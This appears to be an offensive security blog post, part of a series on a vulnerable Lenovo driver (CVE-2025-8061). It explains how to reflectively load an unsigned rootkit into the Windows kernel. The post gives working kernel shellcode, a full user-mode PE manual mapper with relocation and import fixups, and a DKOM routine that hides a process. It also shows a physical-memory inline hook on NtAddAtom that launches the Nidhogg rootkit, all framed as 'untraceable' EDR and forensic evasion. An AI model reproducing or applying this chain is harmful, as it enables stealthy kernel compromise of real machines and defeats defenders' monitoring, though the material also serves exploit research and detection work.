the-ghost-in-the-machine

The complete source code and all supporting components are in the project repository: CVE-2025-8061. This series was inspired by Quarkslab’s article BYOVD to the next level.

If you followed the previous part, we demonstrated how we could use lenovo’s driver primitives to patch g_CiOptions, blinding Driver Signature Enforcement (DSE) to load an unsigned rootkit. But blinding DSE is loud.

As mentioned in the last post, traditional loading via NtLoadDriver creates a massive forensic footprint in the Registry and PsLoadedModuleList. Today, we fix that by dropping the payload directly into kernel memory.

This is Reflective Kernel Loading. In this post, we will walk through the exact process of manually mapping a compiled .sys file into Ring 0, the compiler traps that will intentionally crash your system, and how we ultimately achieved completely invisible DKOM (Direct Kernel Object Manipulation) execution.

Why Reflective Loading?

Patching g_CiOptions got us unsigned code execution. But we announced ourselves to every monitoring tool on the system the moment we called NtLoadDriver.

That syscall is a gift to defenders. The kernel logs the driver in the Event Viewer, carves a Registry entry under the Services key, and permanently stamps a LDR_DATA_TABLE_ENTRY into PsLoadedModuleList. Any EDR worth its license fee enumerates that list constantly. We’d be visible before our DriverEntry even returned.

Reflective loading is the answer. Instead of handing our payload to the Windows OS Loader and asking it to parse, map, and register the driver for us, we do every single one of those steps ourselves in user-mode, and then drop the finished result directly into kernel memory. The OS never sees a load event because, as far as it’s concerned, one never happened.

The stealth properties follow naturally:

No OS Registration: We never call NtLoadDriver or touch the SCM. Our driver never enters PsLoadedModuleList, so kernel-walking EDR have nothing to enumerate.
No Disk Artifacts: The .sys file never lands on the target’s filesystem. It can be pulled from a C2 server and mapped entirely in memory, leaving no path for file-based forensics or hash matching.
No API Hooks: Because we bypass NtLoadDriver entirely, any EDR relying on that chokepoint for telemetry is completely blind to us.

To pull this off through our LSTAR hijack, we need a three-stage pipeline:

Allocate: Execute a first-stage shellcode in Ring 0 to carve out a block of Non-Paged Pool memory as a trusted home for our payload.
Map and Relocate: In user-mode, manually parse the PE, lay out its sections, and rebase every absolute pointer against the actual kernel pool address.
Copy and Execute: Blast the prepared image into the kernel pool and jump directly to DriverEntry.

The Need for the Kernel Pool

We can’t simply point our LSTAR hijack at a buffer sitting in user-mode memory and call it a day. Two separate mechanisms would kill us before we got anywhere.

The first is SMEP. We defeated it in the previous posts using our MSR write primitive, but that’s a transient state. It’s not a permanent solution for housing a resident payload.

The second problem is more fundamental: paging. User-mode memory is pageable by design. The OS can evict any user-mode page to disk at any time. If our rootkit is sitting in paged memory and something tries to execute it at a raised IRQL where page faults are fatal, the kernel panics with a 0xD1 bugcheck. There’s no recovery.

We need memory that the kernel itself trusts unconditionally: the Non-Paged Pool. Pages in the Non-Paged Pool are guaranteed to always be resident in physical memory, are accessible from any IRQL, and carry the kernel’s implicit trust. This is where device drivers, DPC routines, and interrupt handlers live. It’s where our rootkit needs to live too.

To get there, our first-stage shellcode executes briefly in Ring 0 with one job: call ExAllocatePoolWithTag and hand us back the address.

; Stage 1: Pool Allocation Shellcode
xor rcx, rcx                ; PoolType = 0 (NonPagedPoolExecute)
mov rdx, 0x5000             ; NumberOfBytes = size of our driver
mov r8, 0x54534554          ; Tag = 'TEST'
mov rax, [ExAllocatePoolAddress]
call rax                    ; RAX = allocated kernel pool address
mov rdx, userModePtr
mov [rdx], rax              ; Save the Physical Address returned by the API

But how do we know the address of ExAllocatePoolWithTag to put in [ExAllocatePoolAddress]?

We already have the live kernel base, we leaked ntoskrnl.exe’s load address earlier in the exploit chain using NtQuerySystemInformation. From there, resolving any kernel export is straightforward. We load a local copy of ntoskrnl.exe into our process using DONT_RESOLVE_DLL_REFERENCES then use GetProcAddress to find the function’s offset within that local copy. Since ASLR only slides the base, the relative offset of any export within the module is identical between our local copy and the live kernel image:

UINT64 GetKernelModuleExport(UINT64 moduleLiveBase, const char* moduleName, const char* functionName) {

	// Safely map the module into user-space without executing any DllMain
	HMODULE hModule = LoadLibraryExA(moduleName, NULL, DONT_RESOLVE_DLL_REFERENCES);

	if (!hModule) {
		// If it fails, it might be a driver in the drivers directory (e.g., fltmgr.sys)
		char driverPath[MAX_PATH];
		snprintf(driverPath, MAX_PATH, "C:\\Windows\\System32\\drivers\\%s", moduleName);
		hModule = LoadLibraryExA(driverPath, NULL, DONT_RESOLVE_DLL_REFERENCES);
		if (!hModule) {
			printf("[-] Failed to load module locally: %s\n", moduleName);
			return 0;
		}
	}

	UINT64 qFunctionOffset = (UINT64)GetProcAddress(hModule, functionName) - (UINT64)hModule;
	UINT64 functionAddr = moduleLiveBase + qFunctionOffset;

	FreeLibrary(hModule);

	return functionAddr;
}

// Resolving ExAllocatePoolWithTag:
UINT64 ExAllocatePoolWithTag = GetKernelModuleExport(
    kernelBase, "ntoskrnl.exe", "ExAllocatePoolWithTag"
);

We embed this resolved address into our shellcode, fire the exploit, and read RAX back from Ring 0. What comes back is a raw, executable, always-resident chunk of kernel memory.

User-Mode Manual Mapping and Relocation

We have a kernel pool address. Now we need to answer a deceptively simple question: what exactly do we copy into it?

The instinct is to just read the .sys file off disk and blast its raw bytes into the pool. That won’t work. A PE file on disk is a storage format, not an execution format. The Windows OS Loader normally bridges that gap but now we have to do its job ourselves. There are two problems to solve.

First, the layout is wrong. On disk, PE sections are packed at FileAlignment boundaries (typically 512 bytes) to minimize file size. In memory, they need to be expanded to SectionAlignment boundaries (typically 4096 bytes, one page). The .text section that starts at file offset 0x400 might need to live at virtual offset 0x1000. If you copy the raw file and jump into it, you’re executing garbage.

Second, the pointers are wrong. The compiler froze every absolute address in the binary assuming the image would load at ImageBase, like 0x140000000 for example, that the linker chose at build time. Our kernel pool is at something like 0xFFFFB880C4210000. Every hardcoded pointer in the image is off by that entire difference. If your driver’s .data section has a global variable and the code tries to access it via an absolute address baked in at compile time, it will read from completely wrong memory and either corrupt something or fault.

We fix both problems in user-mode before a single byte touches the kernel. Doing this work in Ring 0 shellcode would be possible but deeply unpleasant. One bad pointer dereference at that stage and you’re staring at a bugcheck. User-mode is safe, debuggable, and forgiving.

Phase 1: Parsing the PE Headers

Everything starts with the PE header chain. We cast the raw file bytes to IMAGE_DOS_HEADER, validate the MZ magic (0x5A4D), follow e_lfanew to reach the IMAGE_NT_HEADERS64, and validate the PE\0\0 signature.

From the NT headers we extract two critical values: SizeOfImage, which tells us how large the fully expanded in-memory image will be, and ImageBase, which tells us what address the compiler was assuming when it froze all those pointers.

PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)rawData;
PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)(rawData + pDosHeader->e_lfanew);

Phase 2: Allocating the Local Shadow Buffer

We need a local user-mode buffer that mirrors the final in-memory layout of the driver so we can do all our fixups safely before deployment. We allocate SizeOfImage bytes with VirtualAlloc. This gives us a zero-initialized region large enough to hold the fully expanded image:

void* localImageBase = VirtualAlloc(NULL, pNtHeaders->OptionalHeader.SizeOfImage,
                                    MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

Phase 3: Mapping the Headers and Sections

The PE headers go first. We copy SizeOfHeaders bytes from the raw file to the base of the local buffer which preserves the header data that some runtime code may need to walk:

memcpy(localImageBase, rawData, pNtHeaders->OptionalHeader.SizeOfHeaders);

Then we expand each section. We walk the IMAGE_SECTION_HEADER array (.text, .data, .rdata, .pdata…) and for each one, copy SizeOfRawData bytes from the file offset (PointerToRawData) to the correct in-memory offset (VirtualAddress):

PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNtHeaders);
for (int i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++, pSection++) {
    if (pSection->SizeOfRawData > 0) {
        memcpy(
            (UINT8*)localImageBase + pSection->VirtualAddress,  // expanded in-memory position
            rawData + pSection->PointerToRawData,                 // packed on-disk position
            pSection->SizeOfRawData
        );
    }
}

Phase 4: Base Relocations

Every absolute address the compiler baked into the binary is wrong, and we have to correct all of them before execution.

The compiler left us a map for doing exactly this: the .reloc section, formally the Base Relocation Directory. It’s a list of every location in the image that contains an absolute pointer that needs to be adjusted if the image loads somewhere other than ImageBase.

We calculate the delta the difference between where the image actually lives (our kernel pool address) and where the compiler thought it would live and add that delta to every pointer the relocation table identifies:

UINT64 delta = allocatedKernelPool - pNtHeaders->OptionalHeader.ImageBase;

The relocation data is organized as a series of IMAGE_BASE_RELOCATION blocks, each covering a 4KB page of the image. Each block starts with the VirtualAddress of the page it describes and a SizeOfBlock field, followed by a packed array of 16-bit entries. The top 4 bits of each entry are the relocation type; the bottom 12 bits are the offset within the page to the pointer that needs patching:

PIMAGE_BASE_RELOCATION pReloc = (PIMAGE_BASE_RELOCATION)(
    (UINT8*)localImageBase +
    pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress
);

while (pReloc->VirtualAddress != 0) {
    UINT32 entryCount = (pReloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION))
                        / sizeof(BASE_RELOCATION_ENTRY);
    PBASE_RELOCATION_ENTRY pEntry = (PBASE_RELOCATION_ENTRY)(pReloc + 1);

    for (UINT32 i = 0; i < entryCount; i++, pEntry++) {
        if (pEntry->Type == IMAGE_REL_BASED_DIR64) {
            UINT64* ptr = (UINT64*)((UINT8*)localImageBase
                          + pReloc->VirtualAddress
                          + pEntry->Offset);
            *ptr += delta;
        }
    }
    pReloc = (PIMAGE_BASE_RELOCATION)((UINT8*)pReloc + pReloc->SizeOfBlock);
}

We only handle IMAGE_REL_BASED_DIR64 entries, the only type that appears in a 64-bit kernel driver. Each one points us at an 8-byte absolute address embedded somewhere in the image. We add delta to it, and now that pointer correctly references the actual kernel pool address.

Phase 5: Resolving the Import Address Table

The final step is fixing the IAT. Our driver may import kernel functions it needs. On disk, the IAT slots contain placeholder hint values, not real addresses. The OS Loader normally walks the Import Directory, finds each imported DLL, and overwrites those slots with live function pointers. We have to do the same.

We walk the IMAGE_IMPORT_DESCRIPTOR array. Each entry names a module and contains two parallel thunk arrays: the Original First Thunk (which preserves the import names for us to look up) and the First Thunk (the actual IAT slots we need to overwrite with live addresses). For each imported function, we call our GetKernelModuleExport helper which resolves the live kernel address using the same local-copy RVA transplant technique from Step 1 and write the result directly into the IAT slot:

while (pImportDesc->Name != 0) {
    char* moduleName = (char*)((UINT8*)localImageBase + pImportDesc->Name);

    PIMAGE_THUNK_DATA64 pFirstThunk = (PIMAGE_THUNK_DATA64)((UINT8*)localImageBase + pImportDesc->FirstThunk);
    PIMAGE_THUNK_DATA64 pOriginalFirstThunk = (PIMAGE_THUNK_DATA64)((UINT8*)localImageBase + 
        (pImportDesc->OriginalFirstThunk ? pImportDesc->OriginalFirstThunk : pImportDesc->FirstThunk));

    // Determine the live base address for the imported module
    // If importing from other than ntoskrnl, we would need to privesc first
    UINT64 moduleLiveBase;
    if (strcmp(moduleName, "ntoskrnl.exe") == 0) moduleLiveBase = liveNtoskrnlBase;
    else moduleLiveBase = LeakKernelModuleBase(moduleName); 

    while (pOriginalFirstThunk->u1.AddressOfData != 0) {
        UINT64 kernelFunctionAddress = 0;

        // Check if importing by Ordinal or by Name
        if (IMAGE_SNAP_BY_ORDINAL64(pOriginalFirstThunk->u1.Ordinal)) {
            UINT16 ordinal = IMAGE_ORDINAL64(pOriginalFirstThunk->u1.Ordinal);
            kernelFunctionAddress = GetKernelModuleExport(moduleLiveBase, moduleName, (const char*)(uintptr_t)ordinal);
        } else {
            PIMAGE_IMPORT_BY_NAME pImportByName = (PIMAGE_IMPORT_BY_NAME)((UINT8*)localImageBase + pOriginalFirstThunk->u1.AddressOfData);
            kernelFunctionAddress = GetKernelModuleExport(moduleLiveBase, moduleName, pImportByName->Name);
        }
        
        // Write the live kernel address into the driver's IAT
        pFirstThunk->u1.Function = kernelFunctionAddress;

        pFirstThunk++;
        pOriginalFirstThunk++;
    }
    pImportDesc++;
}

At the end of this function we return a user-mode buffer containing a perfectly laid-out, fully relocated, import-resolved image of our driver, calibrated precisely to live at allocatedKernelPool. It’s ready to be copied into the kernel.

Our driver is perfectly aligned and relocated in our user-mode buffer. We are ready to deploy.

For the Shellcode we simply use the x64 primitive rep movsb.

; COPY
cld                         ; Clear direction flag
mov rdi, KernelPoolAddress  ; Destination (Kernel)
mov rsi, UserModeBuffer     ; Source (User-mode)
mov rcx, poolSize           ; How much to copy
rep movsb                   ; Fire!

; EXECUTE
xor rcx, rcx                ; Arg 1: DriverObject = NULL
xor rdx, rdx                ; Arg 2: RegistryPath = NULL
mov rax, absoluteEntryPoint ; Calculate Entry Point
call rax                    ; Execute the Rootkit!

Notice that we explicitly pass NULL (xor rcx, rcx) as the DriverObject. Since the OS didn’t load us, we don’t have one. We fired the exploit. The shellcode executed. And the system instantly blue-screened.

Bugcheck 0x139 with Argument 1 set to 0x6. In the Windows kernel, 0x6 translates to FAST_FAIL_GS_COOKIE_INIT.

When you compile a C project using Visual Studio and the WDK, it injects security mitigations, most notably the Buffer Security Check (/GS) or “Stack Cookie.”

Normally, when the Windows OS Loader starts a driver, it initializes a randomized __security_cookie inside the .data section before DriverEntry is called. Our code pushed this cookie onto the stack upon entering a function, and checked it upon exiting to ensure no buffer overflows occurred.

Because we bypassed the OS Loader, the cookie was never initialized. The compiler’s injected check saw a blank cookie, assumed the stack was compromised and executed an int 29h halting the CPU.

So we cannot use standard compiler security mitigations in a reflectively mapped kernel payload. We have to strip them from the project:

Release Mode: Debug mode forces cookies regardless of settings. We switched to Release.
Disable /GS: Set Buffer Security Check to Disable (/GS-).
Disable /sdl: Set SDL Checks to No (/sdl-). Visual Studio uses SDL as a master override; if it’s on, /GS comes back from the dead.
Override the Entry Point: The WDK linker defaults to GsDriverEntry (a wrapper that checks the cookie). We forced the linker Entry Point directly to DriverEntry.

After verifying with dumpbin /disasm that the __security_cookie strings were gone, we redeployed. And hit another blue screen.

The Second Trap: The Object Manager Illusion (Bugcheck 0xD1)

This crash was a 0xD1 (DRIVER_IRQL_NOT_LESS_OR_EQUAL), but the main hint was Argument 1: The instruction attempted to access memory address 0x68.

Why 0x68? Because 0x68 is exactly NULL + 0x68.

In the 64-bit Windows kernel, 0x68 is the exact byte offset for DriverUnload inside the _DRIVER_OBJECT structure. Inside our DriverEntry, we had standard boilerplate code:

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = UnloadRoutine; // <--- FATAL FLAW
    // ...
}

Because we reflectively loaded the driver, we passed NULL in the RCX register for the DriverObject. When our C code said “go to DriverObject and write to the DriverUnload field,” the CPU calculated 0x0 + 0x68, tried to access the protected unmapped zero-page, and instantly crashed the system.

When you reflectively load a driver, you are not a legitimate driver. You are uninvited code running in Ring 0. You cannot interact with the Windows Object Manager.

We deleted all references to DriverObject, which in our case was just the Unload routine. Our DriverEntry was stripped down to a raw, pure DKOM execution function that simply iterated the PsActiveProcessLinks doubly-linked list, found our target hello.exe, and unlinked it.

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    UNREFERENCED_PARAMETER(DriverObject);
    
    // Execute DKOM directly, ignore OS integration
    WalkProcListAndHide(); 
    
    return STATUS_SUCCESS;
}

The Invisible Execution

With the compiler traps stripped and the Object Manager illusions removed, we launched the exploit one final time.

The shellcode successfully executed.
The manual mapper relocated the buffer.
The rep movsb copied the payload into the Non-Paged pool.
The execution jumped to DriverEntry.

hello.exe disappeared from the task manager. We dumped the PsLoadedModuleList in WinDbg. Our rootkit was nowhere to be found.

By combining the MSR LSTAR hijack with a fully weaponized reflective loader, we completely bypassed Driver Signature Enforcement without leaving a single trace on the disk or in the OS loader logs.

We can extend this loader beyond our minimal DKOM payload. A more capable rootkit like Nidhogg maps cleanly through the same pipeline; the only requirements are that DRIVER_REFLECTIVELY_LOADED is defined before compilation so Nidhogg skips its own driver registration logic, and that the binary is built with security cookies disabled for the same reasons we covered earlier.

Why This Implementation Will Eventually Kill Your System

At this point the exploit works, but it’s sitting on a time bomb.

The issue isn’t correctness, it’s stability under memory pressure. To demonstrate, lower the target VM’s RAM to 2GB and run the exact same exploit against Nidhogg.

0xA is IRQL_NOT_LESS_OR_EQUAL. The kernel attempted to access a virtual address at a raised IRQL and the page wasn’t there. The first argument is the faulting address; the third (0x0) confirms this was a read, not a write.

The IRQL Trap

Because we hijacked LSTAR and used our ROP chain to disable hardware interrupts, we effectively forced the processor into a high Interrupt Request Level (IRQL). In Windows, when you disable interrupts, you are operating at an elevated IRQL (like DIRQL or HIGH_LEVEL). At this level, the CPU cannot service page faults because fetching memory from the disk fundamentally relies on the very interrupts we just muted.

When Nidhogg’s DriverEntry starts doing its heavy lifting (allocating memory, registering object callbacks, resolving strings…) it touches memory that Windows previously deemed non-essential and swapped out to the disk (the pagefile) due to our artificial 2GB RAM starvation.

The CPU hits the missing page, tries to throw an interrupt to tell the hard drive to fetch the data, realizes interrupts are disabled, and instantly panics. Under high memory pressure, the crash was an inevitable architectural collision.

What We Are Missing

We brute-forced a raw Ring-0 transition right into a massive rootkit initialization routine. By doing so, we are missing the foundational OS structures required for a stable payload execution:

A Clean PASSIVE_LEVEL Context: Necessary to handle page faults, pool allocations, and blocking kernel API calls.
Thread State Alignment: Windows expects a specific thread state when running heavy NTAPI functions (like ObRegisterCallbacks).
Proper Exception Handling: We ran non-paged strictness in a paged-pool reality.

The Fix: Hooking Over Hijacking

To fix this, we need to stop treating the LSTAR ROP chain as our primary execution environment and start treating it as a brief tool. We cannot execute a heavy rootkit directly from a hijacked syscall context.

How do we achieve stable execution? The solution is to place an inline hook on an obscure, rarely used system call to gracefully redirect execution to our payload.

The immediate hurdle is that kernel executable pages are strictly marked as Read-Execute (RX) in virtual memory; if we try to overwrite them directly, the system will crash. However, page permissions are purely a virtual memory construct enforced by the CPU’s MMU. Raw physical RAM has no concept of “read-only.”

This is where the arbitrary physical read/write primitives we discovered in the vulnerable driver (from Part 1) finally become the star of the show. By interacting directly with physical memory, we can completely bypass the OS’s virtual memory protections.

So what do we need to do is:

Load the Driver in Memory: The initial stage of our manual mapping process remains completely unchanged. We can reuse our existing logic to allocate a kernel pool and copy the rootkit’s PE sections into it. Because we explicitly allocate this space using a non-paged pool type (e.g., NonPagedPool), the driver’s actual bytes are permanently pinned in RAM.
Leak the Physical Address: We use our LSTAR hijack to execute a tiny, safe shellcode stub that calls MmGetPhysicalAddress. This translates the virtual address of our target system call into its exact physical memory location.
Plant the Hook: Using the driver’s physical write primitive, we write a trampoline (a jump instruction) directly to that physical address, redirecting the system call to Nidhogg’s DriverEntry.
Execute and Clean Up: We trigger the hooked system call natively from user-mode. Once Nidhogg successfully initializes in a perfectly stable PASIVE_LEVEL environment, we use the physical write primitive one last time to restore the original bytes, erasing our tracks.

This exact methodology is the stable solution documented by Quarkslab in their deep-dive on this CVE: BYOVD to the next level (part 2) — rootkit like it’s 2025.

It’s time to refactor our exploit to use this physical memory route.

The Physical Hooking Implementation

To achieve the stable, PASSIVE_LEVEL execution that a heavy rootkit requires, we must bridge the gap between our initial virtual memory setup and the raw physical memory primitives provided by the vulnerable driver.

Phase 1: Resolving Dependencies and Locking Memory

Before we can manipulate anything, we need the exact addresses of our targets. We use GetKernelModuleExport to resolve the virtual addresses of both NtAddAtom (our target system call) and MmGetPhysicalAddress (the NTAPI function required to translate virtual addresses to physical ones).

// Allocate memory for a full 64-bit pointer (8 bytes)
Buffer = VirtualAlloc(NULL, sizeof(UINT64), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// Lock it in physical RAM so the OS cannot page it to disk
VirtualLock(Buffer, sizeof(UINT64));
volatile UINT64& NtAddAtomPhys = *(volatile UINT64*)Buffer;

Phase 2: The NtAddAtom Address Leak

Instead of using the LSTAR ROP chain to execute the massive rootkit, we reduce its role to a split-second operation: translating our virtual address.

The BuildLeakNtAtomPayload function constructs a tiny, precise piece of shellcode:

mov rcx, NtAddAtom            ; Sets up the first argument: the virtual address we want to translate
mov rax, MmGetPhysicalAddress 
call rax                      ; Call the translation function
mov rdx, userModeBuffer
mov [rdx], rax                ; Writes the physical address into user-mode memory

Phase 3: The Physical Hooking Mechanism

With the physical address secured, we move to the core of the bypass. Virtual memory pages containing kernel code are strictly marked as Read-Execute (RX). If we tried to use a standard kernel virtual-write primitive to overwrite NtAddAtom, the Memory Management Unit (MMU) would block it.

However, physical memory has no concept of page protections. By routing our writes through the vulnerable driver’s physical memory primitive, we bypass the MMU entirely.

This is handled by the ExecutePayloadViaPhysicalHook function:

The 12-Byte Trampoline

BYTE hookBytes[12] = { 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xE0 };
*(UINT64*)(&hookBytes[2]) = PayloadAddress;

This is standard x64 absolute jump shellcode. It translates to:

mov rax, [PayloadAddress]
jmp rax

Read, Write, and Trigger

First, we use the physical read primitive to save the original 12 bytes of NtAddAtom. We must put these back later to keep the system running.

ReadPhysicalMemory(hDev, NtAddAtomPhys, sizeof(originalBytes), originalBytes)

Next we use the physical write primitive to overwrite the start of NtAddAtom with our trampoline.

WritePhysicalMemory(hDev, NtAddAtomPhys, hookBytes, sizeof(hookBytes)

This is where the magic happens. We drop back to user-mode and call NtAddAtom directly via ntdll.dll which, you guessed it, would execute our payload.

HMODULE hNtdll = GetModuleHandleA("ntdll.dll");

if (hNtdll) {
	pNtAddAtom triggerNtAddAtom = (pNtAddAtom)GetProcAddress(hNtdll, "NtAddAtom");
	if (triggerNtAddAtom) {
		// This drops us into Ring-0 legally, cleanly, and at PASSIVE_LEVEL.
		// The kernel hits our hook, jumps to Nidhogg's DriverEntry, initializes, and returns.
		triggerNtAddAtom(NULL, 0, NULL);
    }
}

Why ntdll.dll? By calling the native API from user-mode, the Windows operating system performs a completely legitimate context switch into Ring-0. It sets up the thread state, handles the syscall transition, and enters the kernel at a clean, stable PASSIVE_LEVEL.

When the OS blindly jumps to NtAddAtom, it hits our physical trampoline and redirects straight into Nidhogg’s DriverEntry. The rootkit initializes natively and returns.

Immediately after Nidhogg returns execution to us, we use our physical write primitive one last time to write the originalBytes back into memory.

Because we abandoned the hijacked ROP context to initialize the rootkit and instead opted for a clean syscall transition via a physical hook, the system remains completely stable, even when RAM usage is over 80%.

Conclusion: The Perfect Ghost

What started as a simple Bring Your Own Vulnerable Driver (BYOVD) exploit has evolved into a fully weaponized, untraceable rootkit deployment pipeline. We didn’t just temporarily blind Driver Signature Enforcement; we completely removed the Windows operating system from the loading equation.

By manually mapping the PE file in user-mode, resolving its imports against the live kernel, and copying it directly into the Non-Paged Pool, we achieved our primary goal: absolute stealth. We left no Event Logs, created no Service Registry keys, and left no LDR_DATA_TABLE_ENTRY sitting in the PsLoadedModuleList for EDRs to find.

However, as we discovered, dropping code into Ring 0 is only half the battle. Raw execution is not the same as stable execution. By abandoning the fragile, elevated-IRQL context of our LSTAR hijack and pivoting to a transient physical memory hook, we built a bridge to a clean PASSIVE_LEVEL thread. This allowed a heavy, complex rootkit like Nidhogg to initialize natively, allocate memory, and register callbacks without triggering a system-halting bugcheck even under extreme RAM starvation.

Here is the final anatomy of our exploit chain:

Initial Access: Exploiting a vulnerable driver for arbitrary physical read/write primitives.
Execution Primitive: Hijacking the LSTAR MSR to gain transient Ring-0 code execution.
Memory Preparation: Using a first-stage shellcode to safely allocate trusted Non-Paged Pool memory.
Manual Mapping: Parsing, rebasing, and resolving the rootkit PE entirely in user-mode to evade OS loading telemetry.
Stabilization: Translating the virtual address of NtAddAtom to physical memory and hooking it via raw physical writes to bypass MMU Read-Execute (RX) protections.
Deployment: Triggering the hooked syscall via ntdll.dll to execute the rootkit in a OS-backed thread state before instantly restoring the original bytes to erase our tracks.

The result is the perfect ghost in the machine.

> Previous: bypassing-dse

Mail sent successfully!

Thanks — I'll reply soon.